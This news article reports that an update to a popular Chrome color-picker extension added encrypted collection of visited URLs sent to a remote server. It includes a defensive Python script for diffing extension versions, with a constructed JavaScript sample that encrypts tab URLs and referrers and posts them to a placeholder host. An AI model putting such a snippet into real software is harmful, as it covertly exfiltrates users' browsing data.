
A widely used Chrome extension designed to help users pick colors from web pages has come under scrutiny after researchers discovered it quietly introduced encrypted tracking functionality in a recent update.
The extension, installed by over 400,000 users, now appears to collect browsing data and obscure it before transmission.
The issue was identified by Annex Security’s researcher “@tuckner,” who shared a technical breakdown on X after analyzing changes in version 1.4.4 of the Color Picker – Eyedropper Tool extension. By comparing the update against the previous 1.4.3 release, the researcher found newly added encryption routines embedded within the extension’s service worker, a component typically used to manage background tasks in browser extensions.

According to the analysis, the encryption mechanism serves no legitimate purpose for a tool whose sole function is to extract color values from web pages. Instead, it is used to obfuscate a data payload that includes users’ visited URLs and referrer information. The encrypted data is then transmitted to a remote endpoint associated with the domain colorspicker.net, specifically a path labeled “/trendingSafe.”
Tuckner noted that while the extension attempts to legitimize the behavior by including CSS color data in the transmitted payload, the implementation appears deliberately designed to conceal broader tracking activity. The use of encryption, described sarcastically by the researcher as “bitcoin-style,” makes it more difficult for users and analysts to inspect what information is being exfiltrated.
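The version-to-version comparison described above can be approximated with a short triage script. This is an added example, not the researcher's tooling or the extension's code: the indicator patterns, function names, and the inline `OLD`/`NEW` sources (including the `telemetry.example.invalid` host) are constructed assumptions for illustration.

```python
import re
from pathlib import Path

# Heuristic patterns chosen for this example (assumptions, not an exhaustive list).
INDICATORS = {
    "crypto": re.compile(r"crypto\.subtle\.\w+|\b(?:AES|RSA)-[A-Z]+\b"),
    "network": re.compile(r"\bfetch(?=\s*\()|XMLHttpRequest|sendBeacon|WebSocket"),
    "browsing_data": re.compile(r"chrome\.(?:tabs|webNavigation|history)\.\w+|\breferrer\b"),
    "host": re.compile(r"https?://([A-Za-z0-9.-]+)"),
}

def load_unpacked(root):
    """Read every .js file of an unpacked extension into {relative path: source}."""
    base = Path(root)
    return {str(p.relative_to(base)): p.read_text(errors="replace") for p in base.rglob("*.js")}

def scan(files):
    """Collect the distinct indicator strings present in one version."""
    found = {name: set() for name in INDICATORS}
    for source in files.values():
        for name, pattern in INDICATORS.items():
            for m in pattern.finditer(source):
                found[name].add(m.group(1) if pattern.groups else m.group(0))
    return found

def new_indicators(old_files, new_files):
    """Indicators present in the new version but absent from the old one."""
    old, new = scan(old_files), scan(new_files)
    return {k: sorted(new[k] - old[k]) for k in INDICATORS if new[k] - old[k]}

def needs_review(delta):
    """New crypto arriving together with new network egress is the pattern to escalate."""
    return "crypto" in delta and ("network" in delta or "host" in delta)

# Constructed samples for illustration; NOT the real extension's code.
OLD = {"service_worker.js": "chrome.runtime.onMessage.addListener((m, s, reply) => reply(pick(m)));\n"}
NEW = {"service_worker.js": OLD["service_worker.js"] + """
chrome.tabs.onUpdated.addListener(async (id, info, tab) => {
  const body = JSON.stringify({ url: tab.url, referrer: lastReferrer, colors: [] });
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const ct = await crypto.subtle.encrypt({ name: "AES-GCM", iv }, key, enc.encode(body));
  fetch("https://telemetry.example.invalid/upload", { method: "POST", body: ct });
});
"""}

if __name__ == "__main__":
    delta = new_indicators(OLD, NEW)
    for category, items in delta.items():
        print(f"{category}: {items}")
    print("escalate for manual review:", needs_review(delta))
```

For real releases, pass two unpacked version directories through `load_unpacked`. String matching of this kind misses minified or obfuscated code, so a clean result does not replace reading the diff.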
The extension now also introduces a consent prompt upon installation or update, asking users to agree to the collection of “anonymous data (visited URLs and CSS colors)” purportedly to support a feature called “Trending Colors.” However, the wording and presentation of the prompt raise concerns that users may accept the request without fully understanding its implications.

Color Picker – Eyedropper Tool is listed as a “Featured” extension on the Chrome Web Store and maintains a high rating of 4.8 stars, signaling a level of trust and vetting by Google. Its large user base and featured status make the introduction of such behavior particularly concerning, as it demonstrates how even widely trusted extensions can change functionality in ways that compromise user privacy.
Google has not issued a public statement regarding the findings, and the extension remains available on the Chrome Web Store at the time of writing.

This incident adds to a growing pattern of browser extensions being leveraged for data collection and monetization after gaining user trust. In recent cases, extensions have been caught injecting ads, scanning installed add-ons, or transmitting user data without clear disclosure.
Users who have installed Color Picker – Eyedropper Tool should consider removing or disabling the extension until more clarity is provided. As a general precaution, users are advised to review extension permissions and recent updates regularly, and avoid granting unnecessary data access, especially browsing history.






